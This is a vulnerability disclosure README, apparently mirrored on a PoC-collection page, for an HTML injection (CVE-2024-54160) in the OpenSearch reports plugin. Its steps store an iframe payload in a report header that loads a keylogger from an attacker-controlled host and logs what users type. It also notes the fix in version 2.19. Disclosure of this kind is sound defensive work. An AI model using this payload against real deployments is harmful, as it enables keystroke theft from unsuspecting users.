来源

关联漏洞

介绍

# [CVE-2024-54160]-Opensearch-HTML-Injection

It was found that the Opensearch plugin called "reports" was vulnerable to HTML-injection in version 2.18.0.
The report functionality allowed users to store HTML in the header and footer while creating a new report definition. 
Below is a quick proof of concept where I stored an iframe in the header functionality that fetched a JavaScript keylogger from my local machine which recorded the keys typed by the user.

# PoC
1. Edit the keylogger.html file and add a local IP which python3 http.server is running on.
2. Save the keylogger.html 
3. Start the python3 server with "python3 -m http.server" in the same path as the keylogger.html file
4. Go to Reports
5. Fill the required fields
6. Select PDF
7. Enable header or footer
8. Enter the iframe payload -> ```<iframe src="http://<IP>:8000/keylogger.html">```
9. Click "Preview" - The keylogger should be loaded from the python server
10. Type something on the keyboard and watch the response in the python server

# Screenshot of the PoC in action
- The iframed content is rendered to the left (I know it's simple and ugly, but it works for a poc :) ).
- The logged keystrokes are shown to the right. (The keylogger PoC was not optimal since it missed some keystrokes though!)

![Screenshot 2024-12-17 141054](https://github.com/user-attachments/assets/bc066e1e-3878-4d3e-9eb2-449066569427)

# Remedial Action
This is remediated in Opensearch version 2.19, where the data passed in the footer/header functionality are sanitized with DOMpurify.

Release notes
https://github.com/opensearch-project/opensearch-build/blob/main/release-notes/opensearch-release-notes-2.19.0.md

# PR from Opensearch
https://github.com/opensearch-project/dashboards-reporting/pull/476

文件快照

 [4.0K]  /data/pocs/f1b095c37f1bc87b5e9751adbbd5cb8c9aad5859
├── [1.0K]  keylogger.html
└── [1.7K]  README.md

0 directories, 2 files

备注